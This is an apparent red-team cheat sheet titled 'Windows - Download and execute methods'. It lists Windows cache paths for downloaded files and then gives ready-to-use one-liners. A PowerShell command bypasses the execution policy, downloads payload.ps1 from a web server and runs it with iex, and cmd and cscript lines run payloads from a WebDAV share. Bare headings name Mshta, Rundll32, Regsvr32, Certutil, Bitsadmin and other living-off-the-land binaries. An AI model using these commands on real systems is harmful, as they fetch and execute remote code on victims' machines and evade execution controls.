Windows - Download and execute methods
Downloaded files location
C:\Users<username>\AppData\Local\Microsoft\Windows\Temporary Internet Files\
C:\Users<username>\AppData\Local\Microsoft\Windows\INetCache\IE<subdir>
C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV
Powershell
From an HTTP server
powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://webserver/payload.ps1')|iex"From a Webdav server
powershell -exec bypass -f \\webdavserver\folder\payload.ps1Cmd
cmd.exe /k < \\webdavserver\folder\batchfile.txtCscript / Wscript
cscript //E:jscript \\webdavserver\folder\payload.txtMshta
Rundll32
Regasm / Regsvc @subTee
Regsvr32 @subTee
Odbcconf
Msbuild
Certutil
Bitsadmin
References
Last updated
Was this helpful?